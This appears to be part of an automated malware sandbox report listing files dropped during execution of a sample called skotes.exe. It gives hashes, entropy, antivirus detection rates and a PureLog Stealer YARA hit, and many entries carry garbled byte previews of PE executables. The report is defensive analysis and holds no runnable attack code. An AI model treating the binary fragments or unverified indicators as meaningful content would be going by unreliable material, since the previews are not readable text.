                                                                                                                                                                                                                                        Size (bytes):1102336
                                                                                                                                                                                                                                        Entropy (8bit):7.727651311182623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:j1Au2uOU99WpLfrAiuED3Oc8woMYCoW6dRcC1u2:j1iuP9WRryED3OcnboW6n
                                                                                                                                                                                                                                        MD5:68C0E4EEFD4C6A76CFF542EF57A49CA2
                                                                                                                                                                                                                                        SHA1:8AA521628B89F3CE539269229834DA2A87060E76
                                                                                                                                                                                                                                        SHA-256:4E417FD6CCE7DBFF53412A820F4813D01DA0E7F20E7615220AAA1372CC59DB83
                                                                                                                                                                                                                                        SHA-512:D722432CDF836269ED3A6E181DD02C6E49D719CA9D84AA5582447D480F43CCC0F79F2D9A9191171D21EC2EA3306A97C60A0AFF6707FA3CA9E81E957BF8AAD283
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cg..............0......2.......... ........@.. ....................... ............@.....................................O.......H/........................................................................... ............... ..H............text....... ...................... ..`.rsrc...H/.......0..................@..@.reloc..............................@..B........................H...................K........C..........................................W.-... ..B&.n.)T.:..........5.G.+.G...S...Q...0x...O....(p..z..L..S.;.$.Xl...i%.)..Z.IX.v.S^.i7..:.-r""9..5.5..;)S..a.....P^B.Kt?...!'. ..*.k.Y......4..v$...$Q-...0...!.@?.HM.-a.....,.?..X.0.r...,a....r...g.M...s#...q/JOvg.7h!x..Oc<s.....tQ...]..i...0.g...).d.T...Q".r2h7........gdb....@*$S}.#t..B.|.\.@.?.cx8...z....\,.JY.?\...k.}..ki..?.m...>...~.i.]pQQLy..Kb..g..8..._........... .T.....t.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):765568
                                                                                                                                                                                                                                        Entropy (8bit):7.855393940952922
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:4mOcxtujRb4+DR8KwzkS5AMtCxCz3z8JAS3p9+TPtN4+DR8KwzkS5AMtCxCz3z8U:lGtPWQ8C8z3zcB59CNPWQ8C8z3zcB590
                                                                                                                                                                                                                                        MD5:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                                                                        SHA1:00296EA6A56F6E10A0F1450A20C5FB329B8856C1
                                                                                                                                                                                                                                        SHA-256:3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                                                                                                                                                                                                                                        SHA-512:1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2232
                                                                                                                                                                                                                                        Entropy (8bit):5.37859781817162
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:YWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:YLHxvIIwLgZ2KRHWLOugss
                                                                                                                                                                                                                                        MD5:D14F5C7A1B784757B006EEEE95CFEB3E
                                                                                                                                                                                                                                        SHA1:5417FB038407F0961DA315E6650AFC2B5DEE8B84
                                                                                                                                                                                                                                        SHA-256:194A05DA8B661FFA7825AEB07C0A11835B5025AC0A68E2D8CB0B1DF5AF053A34
                                                                                                                                                                                                                                        SHA-512:B08EC6730E6EBBE5C9D0BC2B176B534411CECABC73344974F0D9E7A592EDA093F10E623AFDEFA3ACBA4C975F2BB0A35F97485F5EEA0CDCF08353019B571F1AEF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1114112
                                                                                                                                                                                                                                        Entropy (8bit):7.7336985855739355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
                                                                                                                                                                                                                                        MD5:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                        SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
                                                                                                                                                                                                                                        SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
                                                                                                                                                                                                                                        SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1102336
                                                                                                                                                                                                                                        Entropy (8bit):7.727651311182623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:j1Au2uOU99WpLfrAiuED3Oc8woMYCoW6dRcC1u2:j1iuP9WRryED3OcnboW6n
                                                                                                                                                                                                                                        MD5:68C0E4EEFD4C6A76CFF542EF57A49CA2
                                                                                                                                                                                                                                        SHA1:8AA521628B89F3CE539269229834DA2A87060E76
                                                                                                                                                                                                                                        SHA-256:4E417FD6CCE7DBFF53412A820F4813D01DA0E7F20E7615220AAA1372CC59DB83
                                                                                                                                                                                                                                        SHA-512:D722432CDF836269ED3A6E181DD02C6E49D719CA9D84AA5582447D480F43CCC0F79F2D9A9191171D21EC2EA3306A97C60A0AFF6707FA3CA9E81E957BF8AAD283
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cg..............0......2.......... ........@.. ....................... ............@.....................................O.......H/........................................................................... ............... ..H............text....... ...................... ..`.rsrc...H/.......0..................@..@.reloc..............................@..B........................H...................K........C..........................................W.-... ..B&.n.)T.:..........5.G.+.G...S...Q...0x...O....(p..z..L..S.;.$.Xl...i%.)..Z.IX.v.S^.i7..:.-r""9..5.5..;)S..a.....P^B.Kt?...!'. ..*.k.Y......4..v$...$Q-...0...!.@?.HM.-a.....,.?..X.0.r...,a....r...g.M...s#...q/JOvg.7h!x..Oc<s.....tQ...]..i...0.g...).d.T...Q".r2h7........gdb....@*$S}.#t..B.|.\.@.?.cx8...z....\,.JY.?\...k.}..ki..?.m...>...~.i.]pQQLy..Kb..g..8..._........... .T.....t.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21504
                                                                                                                                                                                                                                        Entropy (8bit):5.336742061370928
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:JiynHMEyyp/He7ik+KcJB669mNPBqVgYERHtNNVYISZS1d7RroV5:PHvtm7ik+KcJB6jRHkISZShkn
                                                                                                                                                                                                                                        MD5:14BECDF1E2402E9AA6C2BE0E6167041E
                                                                                                                                                                                                                                        SHA1:72CBBAE6878F5E06060A0038B25EDE93B445F0DF
                                                                                                                                                                                                                                        SHA-256:7A769963165063758F15F6E0CECE25C9D13072F67FA0D3C25A03A5104FE0783A
                                                                                                                                                                                                                                        SHA-512:16B837615505F352E134AFD9D8655C9CABFA5BFCFBEE2C0C34F2D7D9588AA71F875E4E5FEB8CDF0F7BACC00F7C1CA8DABD3B3D92AFC99ABF705C05C78E298B4A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pm;..........."...0..J..........:i... ........@.. ....................................`..................................h..O...................................Th..8............................................ ............... ..H............text...@I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................i......H........6..p1...........................................................0..8.......s2.....(....}<.....}=.....};....|<.....(...+.|<...(....*.0..P........~.........,B.r...p(.....rc..p(.....(.....r...p.(....(......(....o......(......*.0..8.......s,.....(....}......}......}.....|......(...+.|....(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1978368
                                                                                                                                                                                                                                        Entropy (8bit):7.951049661139132
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:U8xk3UHNh6Wigto5yoQlpkzN4hJ9sFZcUp2Wqqb9877dRSXJw:UckkT6WztobKe4hXsXp3qqb9CGXJ
                                                                                                                                                                                                                                        MD5:C29EB2D3C39A0A808F1910E0E222AC94
                                                                                                                                                                                                                                        SHA1:7270457CD535C48825B4328B9124985E7BF95BE1
                                                                                                                                                                                                                                        SHA-256:0F5AFD165EDE6D66B0A86C84B534AFCF9AC51C46B43C023F632AA0BF4F087819
                                                                                                                                                                                                                                        SHA-512:4AFFDC6C38038F269A51144BB22EE844918AC708E85F1C152911B0D5B82241CDE79F26FD366127A0CD7CC96ECB9AC88A8B0D90677162B6F5D5E87D68B666F118
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^.......pK...........@...........................K.....~.....@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... ..)..........V..............@...alcvhdaz......1......X..............@...vjrkdbwz.....`K.....................@....taggant.0...pK.."..................@...........................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4438776
                                                                                                                                                                                                                                        Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                                        MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                        SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                                        SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                                        SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):765568
                                                                                                                                                                                                                                        Entropy (8bit):7.855393940952922
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:4mOcxtujRb4+DR8KwzkS5AMtCxCz3z8JAS3p9+TPtN4+DR8KwzkS5AMtCxCz3z8U:lGtPWQ8C8z3zcB59CNPWQ8C8z3zcB590
                                                                                                                                                                                                                                        MD5:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                                                                        SHA1:00296EA6A56F6E10A0F1450A20C5FB329B8856C1
                                                                                                                                                                                                                                        SHA-256:3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                                                                                                                                                                                                                                        SHA-512:1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):442368
                                                                                                                                                                                                                                        Entropy (8bit):6.051643515538571
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:yla3KBZV2erraVXk0jUBHkMHa4sQU3vrYd0rsb:yla3KFCk0wuM64sQU3vrYd0rY
                                                                                                                                                                                                                                        MD5:E03777C3B470A91082276CEEB274E6F6
                                                                                                                                                                                                                                        SHA1:607B1C4F360A16CEC36F2DAC91D5A8AA88332653
                                                                                                                                                                                                                                        SHA-256:EA60FC33528B623EA0B8AE52C1A23DF3116D8085A619FDAA463332039584AF83
                                                                                                                                                                                                                                        SHA-512:16972462BFE8D408826EDC21B6101CFA6AB43FACB8E02BD0451BEE0FB0F46C39AC917AD62B0A6D69213395731424092301F3F49162C4B2DB882A47BC30896B66
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....V...............P.../..Z......../.. ....0...@.. ........................2...........@.................................../.K.....0.@W...................`2.....3./.............................................. ............... ..H............text...../.. ..../................. ..`.rsrc...@W....0..X..../.............@..@.reloc.......`2......"2.............@..B................../.....H...........@.......C...@...z.*.........................................6+.(B.99(....*..:+.(.^A.(!...*.....*....(*...*.....*.......*.......*....(*...*..0..........(*...8y.......E....c...O.../...8^...s......... .....:....&8....s.........8....s......... .....9....& ....8....s......... ....8....*s.........8.......0.............*.0.............*.0.............*.0.............*.0.............*....*.......*....0.............*.0.............*....*....0.............*....*...".......
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
